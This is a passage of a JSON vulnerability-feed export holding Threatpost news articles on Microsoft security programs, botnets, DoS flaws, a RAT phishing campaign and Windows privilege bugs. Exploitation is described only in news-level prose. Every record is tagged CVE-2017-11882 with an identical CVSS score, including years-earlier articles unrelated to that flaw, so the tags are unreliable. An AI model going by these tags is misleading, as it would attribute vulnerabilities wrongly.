While this process varies from issue to issue due to the complex nature of vulnerabilities, disclosure will happen just prior to our security update release cycles._\n\nThe company also announced a second information sharing program called the Critical Infrastructure Partner Program (CIPP) that aims to \u201cprovide valuable insights on security policy, including strategies, approaches to help aid the protection efforts for critical infrastructures,\u201d according to Adegbite.\n", "cvss3": {}, "published": "2010-05-18T19:01:18", "type": "threatpost", "title": "Microsoft to Share Vulnerability Details with Governments", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:45:12", "id": "THREATPOST:738BF7215D8F472D205FCBD28D6068E5", "href": "https://threatpost.com/microsoft-share-vulnerability-details-governments-051810/73986/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:28", "description": "Microsoft earlier this week published [a 25-page framework](<http://blogs.microsoft.com/cybertrust/2015/01/27/putting-information-sharing-into-context/>) offering guidance on how to effectively share information and what kinds of information need to be shared in order to reduce overall risk.\n\n[Information sharing](<http://threatpost.com/information-sharing-on-threats-seen-as-a-key-for-auto-makers/108185>) has been an oft-repeated refrain in security and policy-making circles for the better part of the last decade. 
There have been [draft bills](<http://threatpost.com/senate-draft-bill-to-protect-threat-information-sharing/105769>), [sharing platforms](<http://threatpost.com/microsoft-to-preview-interflow-information-sharing-platform/106798>) and every kind of [appeal](<http://threatpost.com/nsas-alexander-appeals-for-threat-information-sharing/102404>), [encouragement](<http://threatpost.com/regulator-warns-banks-about-ddos-attacks-encourages-information-sharing-122712/77349>) and assurance; yet there have also been quiet mutterings that organizations simply do not want to share information for a variety of reasons, not limited to competition concerns and personal embarrassment. In theory, sharing information and building a sort of defensive cooperative seems simple enough. However, the reality is that we are still talking about threat information sharing like it isn\u2019t happening despite the fact that it\u2019s a perpetual topic of discussion at nearly every corporate and government security conference.\n\nMicrosoft\u2019s framework seeks to define all the parties that need to be involved in any comprehensive information sharing exchange as well as the types of information that those groups need to be sharing. In addition to knowing with whom to share what information, Microsoft\u2019s document offers insight into designing methods, mechanisms and models for data sharing exchanges.\n\nBroadly speaking, Microsoft advises that organizations develop an overarching strategy for information sharing and collaboration with built-in privacy protections and well-established governance processes. Sharing, they say, should focus on actionable threat, vulnerability and mitigation information. Organizations need to build relationships in order to enable voluntary, trust-based information sharing, whereas mandatory sharing should remain limited. Once information is being shared, companies must ensure they are using that information to its full potential. 
Beyond these, Microsoft says there needs to be a voluntary, global exchange of emerging best practices.\n\nPerhaps not quite as broadly as best practices, Microsoft is encouraging that information-sharing exchanges of varying degrees of openness discuss successful attacks, including the information lost, techniques used, intent, and impact. They should also trade information about potential future threats and exploitable vulnerabilities and ways of mitigating bugs ahead of patch releases. Executive-level situational awareness, which could allow organizations to respond more quickly to attacks, as well as strategic analysis of threats faced and information sought by attackers, should be shared too.\n\nMicrosoft says there are basically six categories of people to include in exchanges: governments, private critical infrastructure firms, enterprises, information technology, security companies and security researchers.\n\nMicrosoft encourages efforts by policymakers to construct legislation that would encourage information sharing. However, trust between those incorporated into information sharing exchanges, the computer company says, is critically important.\n\n\u201cLaws can compel incident reporting,\u201d Microsoft notes, \u201cbut they do not increase trust or collaboration nor do they reduce risks.\u201d\n\nExchange models can be voluntary or mandatory, though Microsoft explains that the former is the richer model. Microsoft favors voluntary sharing models because they serve to increase the level of trust between partners. 
On the other hand, mandatory models could shift the focus from smart collaborative defense to companies merely reporting threat-related information for the sake of reporting it because they are required to do so.\n\nIn terms of exchange methodology, organizations and groups thereof need to consider the level of formality of their network. Formal exchanges are generally based on contractual or non-disclosure agreements while less formal, ad hoc exchanges are generally event-specific. Subsets of formalized exchanges will be necessarily based on security clearance levels while less formalized groups of like-minded organizations can share information with one another based entirely on trust within the group.\n\n\u201cHigh-quality strategic information can help to project where the next classes of cyber-threats may come from and to identify the incentives that could motivate future attackers, along with the technologies they may target,\u201d Microsoft says. \u201cAdditionally, strategic analysis can help put incidents into a broader context and can drive internal changes, enhancing the ability of any public or private organization to update risk management practices that reduce its exposure to risk.\u201d\n\nInformation sharing, Microsoft\u2019s Cristin Goodwin and J. Paul Nicholas explain, is not merely a human-to-human exercise but must also be automated between machines to some degree.\n\n\u201cAmong security professionals, there is currently a lot of focus on developing systems that automate the exchange of information,\u201d Microsoft wrote. 
\u201cIt is believed that such systems enable actors not only to identify information important to them more quickly, but also to automate mitigations to threats as they occur.\u201d\n", "cvss3": {}, "published": "2015-01-29T13:58:34", "type": "threatpost", "title": "Microsoft Publishes Information Sharing Framework", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-02-03T14:05:30", "id": "THREATPOST:6CF438E98DFFF4B4057CAFB1382A4D3C", "href": "https://threatpost.com/microsoft-publishes-information-sharing-guidelines/110740/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:02", "description": "When Microsoft went after the [Nitol botnet](<https://threatpost.com/microsoft-carries-out-nitol-botnet-takedown-091312/>) in September, one of the key details in the investigation was the fact that much of the botnet was built by pre-loading malware onto laptops during the manufacturing process in China. This was the clearest case yet of the phenomenon of [certified pre-owned devices](<https://threatpost.com/new-study-sees-need-better-software-integrity-controls-061410/>) making their way through the supply chain and into the market. As it turns out, nearly half a million of those infected machines showed up here in the U.S.\n\nResearch from Microsoft into the location of the Nitol-infected machines shows that the large majority of them are in China, nearly 800,000 of them. That\u2019s more than 30 percent of all of the machines on which Microsoft detected the Nitol malware, and the company said that about one in every five machines purchased in China through the compromised supply chain had malware on it.\n\nAlthough the number of infected systems in the United States wasn\u2019t nearly as high as in China, Microsoft did find nearly 500,000 PCs in the U.S. 
loaded with Nitol, a pretty significant volume of infections.\n\n\u201cMMPC\u2019s infection figures for [Win32/Nitol](<http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Win32/Nitol> \"MMPC Encyclopedia entry for Win32/Nitol\" ) reflect the Microsoft study, placing China on the top spot with a whopping 31.60%, way above the United States (18.51%) and Taiwan (16.79%). Thailand and Korea round out the top five,\u201d wrote [Rex Plantodo of the Microsoft Malware Protection Center](<https://blogs.technet.com/b/mmpc/archive/2012/10/22/msrt-october-12-nitol-by-the-numbers.aspx?Redirected=true>).\n\nMicrosoft began looking into the Nitol botnet more than a year ago after buying 20 laptops in China and discovering that some of them had been pre-loaded with the Nitol malware, as well as a few other pieces of malicious software. Nitol is a nasty bit of code and has quite a list of malicious capabilities. It has rootkit functionality and also can launch DDoS attacks on orders from a remote command-and-control server.\n\nMicrosoft\u2019s takedown of Nitol disrupted much of the botnet\u2019s operations, but it didn\u2019t completely eliminate it. 
The company\u2019s detections show a major drop in Nitol infections since September, but there are still more than 200,000 infections in October.\n", "cvss3": {}, "published": "2012-10-24T17:59:06", "type": "threatpost", "title": "Nitol Infections Fall, But Malware Still Popping Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:20", "id": "THREATPOST:C35731BF3D4A3F8D0B1A838FAD1A8832", "href": "https://threatpost.com/nitol-infections-fall-malware-still-popping-102412/77149/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:15", "description": "WASHINGTON\u2013Microsoft has spent several years and untold millions of dollars working on methods to write more secure and reliable software, and now the company is encouraging other organizations to make the same investment in software security.\n\nOne of the outputs of the company\u2019s software security efforts is its much-heralded Security Development Lifecycle (SDLC), a framework for developing methods for writing secure code. However, as Microsoft has acknowledged and other experts have pointed out, the SDLC was developed specifically for Microsoft\u2019s own internal processes and is not a one-size-fits-all methodology. But companies that are interested in using the lessons that Microsoft has learned throughout the process can use the SDLC as a starting point for their own efforts, Jim Molini, a senior program manager at Microsoft, said in a talk at the OWASP AppSec DC conference here Thursday.\n\n\u201cIf you build software, you have to focus on how you build it, because it\u2019s becoming a higher priority attack vector right now,\u201d he said. 
\u201cThey\u2019re finding new ways to attack us and we have to find ways to buttress our software against these attacks.\u201d\n\nMolini said that a software security program has to be a comprehensive effort that includes everyone involved in the development process and must start with a fundamental change in the way that software is written. \n\n\u201cYou have to eliminate the separation of security in the development organization,\u201d he said. \u201cIt\u2019s really going to take people working together to fix this.\u201d\n\nMolini also emphasized that just having a whole bunch of other developers or testers look at the code is not enough.\n\n\u201cMany eyeballs don\u2019t solve the security problem. It\u2019s more than just being able to write code,\u201d Molini said. \u201cIt\u2019s fixing the process aspects and the software development processes in order to reduce the number of vulnerabilities you introduce. You can\u2019t just say zero-defect code is secure. You have to prioritize security as a development goal.\u201d\n\nSoftware security experts often say that when they show developers ways that their applications can be broken or abused, the developers protest that no user would ever do the things that broke the application. Users may not, but attackers most certainly will. To help eliminate this mentality, Molini said developers need to think like attackers and not users.\n\n\u201cYou need to develop abuse cases, not just use cases, so that the test team can develop tests for them,\u201d he said. 
\u201cThat will make your software much more secure in the long run.\u201d\n", "cvss3": {}, "published": "2009-11-12T19:08:15", "type": "threatpost", "title": "Microsoft Pushes for Better Software Security Practices", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:11:49", "id": "THREATPOST:9A9D21304DF605E55290BEAB2BDF62C5", "href": "https://threatpost.com/microsoft-pushes-better-software-security-practices-111209/73089/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:02", "description": "A few days after Microsoft released a patch to fix a vulnerability in ASP.NET that could enable a denial-of-service attack, someone has released exploit code for the vulnerability. \n\nThe proof-of-concept [exploit code](<https://github.com/HybrisDisaster/aspHashDoS>) was posted to the Full Disclosure mailing list and is available for download from GitHub. Posted by a user named HybrisDisaster, the code is designed to exploit a recently discovered vulnerability in ASP.NET that\u2019s related to the way that the software handles certain HTTP POST requests. The vulnerability was first disclosed in late December at the Chaos Communications Congress in Germany.\n\nThe problem isn\u2019t actually specific to ASP.NET, but affects a variety of languages and applications. Microsoft shipped an emergency patch for the flaw on Dec. 29, recommending that users install it as quickly as possible.\n\n\u201cThis vulnerability could allow an anonymous attacker to efficiently consume all CPU resources on a web server, or even on a cluster of web servers. For ASP.NET in particular, a single specially crafted ~100kb HTTP request can consume 100% of one CPU core for between 90 \u2013 110 seconds. 
An attacker could potentially repeatedly issue such requests, causing performance to degrade significantly enough to cause a denial of service condition for even multi-core servers or clusters of servers,\u201d [Microsoft\u2019s Suha Can and Jonathan Ness said](<https://blogs.technet.com/b/srd/archive/2011/12/27/more-information-about-the-december-2011-asp-net-vulnerability.aspx?Redirected=true>) in a blog post about the problem.\n\nThe root cause of the problem is that when ASP.NET comes across a form submission with some specific characteristics, it will need to perform a huge amount of computation that could consume all of the server\u2019s resources.\n", "cvss3": {}, "published": "2012-01-09T16:00:19", "type": "threatpost", "title": "Exploit Code Released for ASP.NET Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:02", "id": "THREATPOST:D58796CB8261B361ADF389131F955AE3", "href": "https://threatpost.com/exploit-code-released-aspnet-flaw-010912/76073/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:55", "description": "The Internet Systems Consortium (ISC) on Tuesday patched a denial-of-service vulnerability in numerous versions of DHCP.\n\nThe flaw affects nearly all IPv4 DHCP clients and relays and most servers, ISC said in its [advisory](<https://kb.isc.org/article/AA-01334>).\n\n\u201cA badly formed packet with an invalid IPv4 UDP length field can cause a DHCP server, client, or relay program to terminate abnormally,\u201d ISC said.\n\nDHCP, or the Dynamic Host Configuration Protocol, automates the assignment of IP addresses and configuration information to IP hosts. 
It\u2019s used in all Windows clients and most Windows server deployments dating back to Windows 98.\n\nThe use of DHCP frees Windows administrators, for example, from manually configuring IP addresses for networked computers.\n\nISC added that servers, clients and relays built to process only unicast packets are not affected by this vulnerability, though the organization cautions that this is an unusual configuration.\n\n\u201cNot all potentially-affected builds will actually be affected, but because it is difficult to identify or predict those which should be upgraded, our advice is that all builds should be considered vulnerable,\u201d ISC said, adding that it is not aware of active exploits against this flaw.\n\nISC added that there are no workarounds available, but there are some measures that can be taken to limit the exposure of DHCP servers.\n\nAdmins are advised to upgrade immediately to DHCP version 4.1-ESV-R12-P1 or DHCP version 4.3.3-P1.\n", "cvss3": {}, "published": "2016-01-13T10:00:25", "type": "threatpost", "title": "DHCP Denial of Service Vulnerability Patched", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-01-13T14:35:27", "id": "THREATPOST:85DEC97DDAF4F3EBF731C2724329904B", "href": "https://threatpost.com/denial-of-service-flaw-patched-in-dhcp/115875/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:26", "description": "When one Pennsylvanian man couldn\u2019t foot his bills, he opted to steal the identity of someone that could \u2013 one of the world\u2019s richest men, Microsoft co-founder and billionaire Paul Allen.\n\nAn AWOL soldier from Pittsburgh swiped Allen\u2019s Citibank credit card account information earlier this year to make a $658.81 payment on a loan from the Armed Forces Bank, according to an [Associated Press 
report](<http://www.washingtonpost.com/business/fbi-awol-pa-soldier-obtained-microsoft-co-founder-debit-card-by-changing-account-address/2012/03/27/gIQAUqoodS_story.html>).\n\nA criminal complaint unsealed Monday claims that after acquiring Allen\u2019s account information, the soldier, Brandon Lee Prince, 28, changed the address of the card to his own and reported it missing in an attempt to have a new card sent to his Pittsburgh address. The card was delivered and soon after, the fraudulent charges began to pile up.\n\nOn top of the loan payment, it was also used at a Pittsburgh GameStop ($278.18), a Family Dollar ($1) and at a Western Union, where Price tried to process a $15,000 transaction.\n\nThe bank noticed the illicit charges and promptly notified the FBI, which had an agent follow Price around the neighborhood. After seeing him wearing the same clothes he wore in surveillance footage taken at the GameStop and Family Dollar stores, Price was arrested on March 2.\n\nAccording to authorities, Price had actually been away from the army since June 2010 and was wanted as a deserter.\n\nAllen, who helped found Microsoft with Bill Gates in 1975, also owns the NBA\u2019s Portland Trailblazers and the NFL\u2019s Seattle Seahawks and has a net worth of about $14.2 billion, [according to Forbes](<http://www.forbes.com/profile/paul-allen/>) \u2013 enough to rank at number 48 on the [publication\u2019s list](<http://www.forbes.com/billionaires/#p_1_s_a0_All%20industries_All%20countries_All%20states_>) of the richest people on the planet.\n\nFor more on this, check out the AP report via the [Washington Post](<http://www.washingtonpost.com/business/fbi-awol-pa-soldier-obtained-microsoft-co-founder-debit-card-by-changing-account-address/2012/03/27/gIQAUqoodS_story.html>).\n", "cvss3": {}, "published": "2012-03-29T15:56:05", "type": "threatpost", "title": "Fortune Favors the Bold? 
Man Steals Microsoft Founder's Identity, Credit Card", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:32", "id": "THREATPOST:51AB3DBBFBFCA1EDCCB83FCECB47C07B", "href": "https://threatpost.com/fortune-favors-bold-man-steals-microsoft-founder-s-identity-credit-card-032912/76380/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-12T05:58:56", "description": "A series of espionage attacks have been uncovered, targeted at service centers in Russia that provide maintenance and support for a variety of electronic goods.\n\nThe payload is a commercial version of the [Imminent Monitor](<https://imminentmethods.net/features/>) tool, which is freely available for purchase as legitimate software. Its developers explicitly prohibit any usage of the tool in a malicious way \u2013 which bad actors are clearly ignoring.\n\nImminent Monitor includes two modules for recording video from a victim\u2019s webcam, along with three others that contain different spy and control functionalities, such as looking at file contents on the victim\u2019s machine.\n\n**A Long and Winding Kill Chain**\n\nFortiGuard Labs said that the multi-stage attacks use a whole bag of tricks to carry out their dirty work, including spoofed emails, malicious Office documents and a variety of unpacking techniques for Imminent Monitor, which functions as a remote access trojan (RAT).\n\nThe kill chain starts, as many attacks do, with fraudulent emails. In this case, they purport to be from Korean consumer electronics giant Samsung. 
FortiGuard researchers said that the nature of the mails suggests a targeted attack, not just a \u201cspray-and-pray\u201d random spam campaign.\n\n\u201cThe email was specifically sent to the service company that repairs Samsung\u2019s electronic devices,\u201d the firm said in [an analysis](<https://www.fortinet.com/blog/threat-research/non-russion-matryoshka-russian-service-centers-under-attack.html>) on Thursday, adding that the emails contain Excel files with the same naming convention that the targeted company uses in legitimate transactions.\n\nFurther, the spreadsheet files, which may have been lifted from a legitimate source, have been weaponized with an exploit for a vulnerability, CVE-2017-11882, in a 17-year-old piece of software.\n\n\u201cThe use of exploits is more efficient than the use of simple executable files, especially since the level of threat-awareness among users has sufficiently grown in recent years,\u201d the team said. \u201cIt is simply not that easy to trick a user to opening executable file as it was before. Exploits are a different case.\u201d\n\nInterestingly, the vulnerability exists in an Office component called the Equation Editor (eqnedt32.exe), which allows users to insert mathematical and scientific equations into documents. It was kept around for compatibility reasons despite being flawed. 
Last year, Microsoft [manually patched](<https://blog.0patch.com/2017/11/did-microsoft-just-manually-patch-their.html>) a buffer overflow bug in it \u2014 the flaw used in these campaigns.\n\nRumors have gone around that choosing to patch the binary file rather than fixing the code itself suggests Microsoft lost the source code of the flawed feature, FortiGuard pointed out.\n\n\u201cThe malware authors clearly love this vulnerability because it allows them to achieve a stable exploitation across all current Windows platforms,\u201d the researchers said.\n\nFrom there, the exploit\u2019s shellcode takes a look at the export directory of the kernel32.dll on the targeted machine and locates the addresses of two key functions: LoadLibraryA and GetProcAddress. These are then used to obtain the addresses of the other necessary functions for the attack, including an important capability to determine the exact landing location for the payload, since this will vary, according to platform.\n\nFinally, the shellcode downloads the Imminent Monitor payload and then tries to execute it: The RAT is tucked into five different protective layers, including the ConfuserEx packer, which obfuscates objects names, as well as names of methods and resources, to make it hard to read and be understood by humans. ConfuserEx actually shows up twice; the second time, it includes a Rick-Rolling attempt.\n\nAnother packer used is the BootstrapCS executable, which performs anti-analysis checks; and eventually, for the final unpacking procedure of the RAT itself, the file uses the legit \u201clzma.dll\u201d library from 7Zip.\n\n**Not Their First Rodeo**\n\nEven though the emails are written in Russian, the attacks are coming from outside the country, carried out by a group known for other campaigns.\n\nThe analysts said that it\u2019s \u201chighly unlikely\u201d that a native Russian speaker wrote the email text, but rather, it seems to be run through a translator. 
Also, even though the \u201cfrom\u201d address appears to be Russian in origin, an examination of the headers revealed that the IP address of the sender isn\u2019t related to the email address\u2019 domain.\n\nIn addition, in analyzing the C2 servers used in the attacks, FortiGuard found, based on the registrant data, that 50 domains were all registered on the same day.\n\n\u201cSome of these domains have already been used for malware spreading,\u201d the firm said. \u201cAnother group was linked to the phishing campaigns.\u201d\n\nFortiGuard also searched its collection of samples and found several spreadsheet samples that use the same C2 servers as the samples from these attacks.\n\n\u201cThe samples are older and use different vulnerabilities,\u201d the researchers said. \u201cWe believe that this same group of attackers are behind both groups of samples.\u201d\n\nWhile it\u2019s unclear who exactly is behind the attacks, it\u2019s clear that this campaign is not the first \u2013 and will probably not be the last \u2013 for the bad actors.\n", "cvss3": {}, "published": "2018-06-07T19:43:35", "type": "threatpost", "title": "Targeted Spy Campaign Hits Russian Service Centers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-06-07T19:43:35", "id": "THREATPOST:F8AE6E328FD84A15442D0329003F9E9B", "href": "https://threatpost.com/targeted-spy-campaign-hits-russian-service-centers/132639/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T23:10:28", "description": "Microsoft\u2019s initial move into the security products market, the ISA Server, has evolved well beyond its firewall roots. Now known as the Threat Management Gateway, the product is being positioned as a comprehensive Web security gateway. 
But as Eric Ogren writes in his [review of the Threat Management Gateway](<http://searchsecurity.techtarget.com/news/column/0,294698,sid14_gci1351077,00.html>) [SearchSecurity.com], the beta release offers enterprise IT shops some solid capabilities, but also has some considerable drawbacks.\n\nMicrosoft, like nearly any other company on the planet, knows how to build products for mid-tier businesses. In high tech, vendors often prematurely rush features to market in efforts to win awards from reviewers and impress prospects with the depth of their feature checklist. Microsoft takes a very conservative approach with its security products to minimize customer administrative costs and provide fundamental security that works for the duration of the Microsoft relationship. This long term view has benefits and drawbacks for IT that can be illustrated by TMG.\n", "cvss3": {}, "published": "2009-03-18T15:56:00", "type": "threatpost", "title": "Microsoft's Threat Management Gateway is a mixed bag", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:35", "id": "THREATPOST:63EC8A47C53B47DB10146ABB77728483", "href": "https://threatpost.com/microsofts-threat-management-gateway-mixed-bag-031809/72404/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:10", "description": "Microsoft uncovered more than 1,800 bugs in Office 2010 by tapping into the unused computing horsepower of idling PCs. Office developers found the bugs by running millions of \u201cfuzzing\u201d tests, said Tom Gallagher, senior security test lead with Microsoft\u2019s Trustworthy Computing group. [Read the full article](<http://www.computerworld.com/s/article/9174539/Microsoft_runs_fuzzing_botnet_finds_1_800_Office_bugs>). 
[Computerworld]\n", "cvss3": {}, "published": "2010-03-31T21:11:20", "type": "threatpost", "title": "MS Discovers Over 1,800 Office 2010 Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:06:49", "id": "THREATPOST:6E19885760DF8E9DD66B4F30158CD173", "href": "https://threatpost.com/ms-discovers-over-1800-office-2010-bugs-033110/73767/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:59", "description": "There are several ongoing investigations attempting to find the authors of the Conficker botnet, one of the fastest spreading worms in history, but those responsible for the worm have proven elusive. [Read the full article](<http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1376771,00.html>). [TechTarget]\n", "cvss3": {}, "published": "2009-12-14T18:55:04", "type": "threatpost", "title": "On the Hunt for Conficker", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T13:54:03", "id": "THREATPOST:051AFF295EB4024C33B9C6988E0F5C34", "href": "https://threatpost.com/hunt-conficker-121409/73256/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:09", "description": "Researchers are warning about a new remotely exploitable vulnerability in 64-bit Windows 7 that can be used by an attacker to run arbitrary code on a vulnerable machine. The bug was first reported a couple of days ago by an independent researcher and confirmed by Secunia.\n\nIn a message on Twitter, a [researcher named w3bd3vil](<https://twitter.com/#%21/w3bd3vil/status/148454992989261824>) said that he had found a method for exploiting the vulnerability by simply feeding an iframe with an overly large height to Safari. 
The exploit gives the attacker the ability to run arbitrary code on the victim\u2019s machine.\n\n\u201cA vulnerability has been discovered in Microsoft Windows, which can be exploited by malicious people to potentially compromise a user\u2019s system. The vulnerability is caused due to an error in win32k.sys and can be exploited to corrupt memory via e.g. a specially crafted web page containing an IFRAME with an overly large \u201cheight\u201d attribute viewed using the Apple Safari browser. Successful exploitation may allow execution of arbitrary code with kernel-mode privileges,\u201d the [Secunia advisory](<https://secunia.com/advisories/47237/>) said.\n\nMicrosoft officials have not confirmed the vulnerability, but said that they\u2019re looking into it.\n\n\u201cWe are currently examining the issue and will take appropriate action to help ensure the customers are protected,\u201d Jerry Bryant, group manager of response communications in Microsoft\u2019s Trustworthy Computing Group, said.\n\nThe only known attack vector for this vulnerability right now is the Safari browser running on Windows 7, which is not the most common combination. Depending upon which metrics one uses, Safari has somewhere in the neighborhood of nine to 11 percent market share. 
It\u2019s not clear how many of those Safari users are running Windows, but it\u2019s likely that the vast majority of them are running Mac OS X.\n\nHowever, it may turn out that other browsers could be used as attack vectors for this vulnerability as more information becomes available.\n", "cvss3": {}, "published": "2011-12-20T16:01:26", "type": "threatpost", "title": "Researchers Warn of New Windows 7 Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:07", "id": "THREATPOST:FEAE151B1861BE9EF40E606D5434AE00", "href": "https://threatpost.com/researchers-warn-new-windows-7-vulnerability-122011/76016/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:05", "description": "A prominent researcher will use an upcoming security conference in Buenos Aires to demonstrate an exploit that allows hackers to bypass the Windows Service Isolation feature, despite Microsoft\u2019s efforts to close the security loophole.\n\nSecurity researcher Cesar Cerrudo of [Argeniss Information Security and Software](<http://www.argeniss.com/>) said he will demonstrate an exploit he has developed that would allow hackers to bypass a security feature called Windows Service Isolation, which is intended to make it easier to access Windows objects without requiring administrator-level privileges. Cerrudo will use the upcoming ekoparty Security Conference in Buenos Aires to present his exploit. 
\n\nWriting to Threatpost.com, Cerrudo said that his presentation will demonstrate a method to bypass the Windows Service Isolation feature, allowing an attacker who is able to upload content to a Windows endpoint running applications such as SQL Server and Internet Information Server (IIS) to elevate her privileges from the limited Local Service or Network Service account to the Local System account, providing broad access to install malicious code on or otherwise modify the system. \n\n\u201cFor instance it will allow you to compromise a Windows system if you can upload content to IIS or exploit any process running under (the) Network Service or Local Service account,\u201d Cerrudo wrote.\n\nThe demonstration, if successful, will poke a hole in a protection plan that Microsoft has proposed for the privilege escalation problem \u2013 part of a larger body of research on privilege escalation problems affecting all flavors of Windows that Cerrudo has documented in his paper \u201c[Token Kidnapping\u2019s Revenge](<http://www.argeniss.com/research/TokenKidnappingRevengePaper.pdf>).\u201d \n\nThe tendency to run popular services with administrator-level privileges has been exploited in the past to install malicious programs on Windows systems. Microsoft added the Windows Service Isolation feature as a configuration option for companies that wanted to harden Windows servers and clients against attack. \n\nMicrosoft has responded to the problems raised by Cerrudo and others with a security update to the Windows Tracing Feature for Services, MS10-059, for Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2. 
The company also [issued a security advisory](<http://www.microsoft.com/technet/security/advisory/2264072.mspx>) for the Windows Service Isolation issue, which provides workarounds for Windows customers running Internet Information Server as well as a security fix for the privilege escalation problem that involves applying an update to the Windows Telephony API. \n\nCerrudo said that the configuration changes suggested by Microsoft will protect Windows machines running IIS, but not other applications. Windows shops that don\u2019t apply the suggested security fix are vulnerable to privilege escalation attacks if they\u2019re running other applications on affected systems. He suggests that Microsoft update its advisory to make it clear that the security fix described in the advisory is a requirement for any customer running applications other than IIS on affected systems. \n\nMicrosoft said it feels confident that its patch and advisory adequately cover the possible attacks that Cerrudo will demonstrate. Jerry Bryant, group manager, Trustworthy Computing, Microsoft, said that its security advisory addresses \u201cthe potential for attacks that leverage the Windows Service Isolation feature by helping to clarify the proper use and limits of the Windows Service Isolation feature.\u201d However, the company notes that Windows Service Isolation is a \u201cdefense-in-depth feature, not a proper security boundary\u201d and shouldn\u2019t be treated as such. 
\n", "cvss3": {}, "published": "2010-09-02T04:28:26", "type": "threatpost", "title": "Researcher Will Demo Bypass of Windows Service Isolation Feature", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:06:25", "id": "THREATPOST:3E3C8752E39F7A8CA5DD91BD283A79E7", "href": "https://threatpost.com/researcher-will-demo-bypass-windows-service-isolation-feature-090210/74416/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:18", "description": "Microsoft is warning of an innovative new technique attackers are using to sneak macro malware past virus detection engines and add to the already huge uptick in reported macro attacks.\n\nResearchers at Microsoft\u2019s Malware Protection Center said they stumbled upon the macro technique in a file containing VBA project scripts with a sample of well-known malicious macro malware called [TrojanDownloader:O97M/Donoff](<https://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=TrojanDownloader:O97M/Donoff>). It wasn\u2019t the malware that piqued Microsoft\u2019s interest; it was the attacker\u2019s never-before-seen obfuscation technique.\n\nIt wasn\u2019t immediately obvious that the macro file was actually malicious, wrote Marianne Mallen and Wei Li, both antivirus researchers at the Microsoft Malware Protection Center, who co-authored [a blog post](<https://blogs.technet.microsoft.com/mmpc/2016/05/17/malicious-macro-using-a-sneaky-new-trick/>) earlier this week on their discovery. \u201cIt [was] a Word file that contains seven VBA modules and a VBA user form with a few buttons (using the CommandButton elements),\u201d wrote both authors.\n\nThe VBA user form contains three buttons. 
